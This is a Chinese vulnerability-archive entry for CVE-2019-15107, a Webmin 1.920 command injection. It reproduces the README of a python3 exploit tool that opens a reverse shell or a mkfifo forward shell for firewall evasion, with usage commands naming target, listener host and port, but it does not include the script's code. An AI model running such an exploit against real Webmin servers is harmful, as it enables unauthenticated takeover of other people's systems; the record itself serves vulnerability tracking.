关联漏洞
标题:
Webmin 命令操作系统命令注入漏洞
(CVE-2019-15107)
描述:Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的password_change.cgi存在命令操作系统命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。
描述
CVE-2019-15107 Webmin 1.920 RCE
介绍
# CVE-2019-15107 Webmin 1.920 Unauhenticated Remote Command Execution
A python3 script for the CVE-2019-15107 Webmin 1.920 Unauhenticated Remote Command Execution that creates a reverse shell or a pseudo interactive shell using mkfifo for firewall evasionA python3 script for the CVE-2019-15107 Webmin 1.920 Unauhenticated Remote Command Execution that creates a reverse shell or a pseudo interactive shell using mkfifo for firewall evasion
## Getting Started
### Executing program
* With python3
```
python3 webmin.py -t https://webmin.site/ -lhost 127.0.0.1 -lport 9001
```
* For forward shell firewall evasion
```
python3 webmin.py -t https://webmin.site/ -fs
```
## Help
For help menu:
```
python3 webmin.py -h
```
## Disclaimer
All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.
文件快照
[4.0K] /data/pocs/13f4e68bfad52a3d7e0e03d60aa77149572a1ad1
├── [1.2K] README.md
└── [4.8K] webmin.py
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。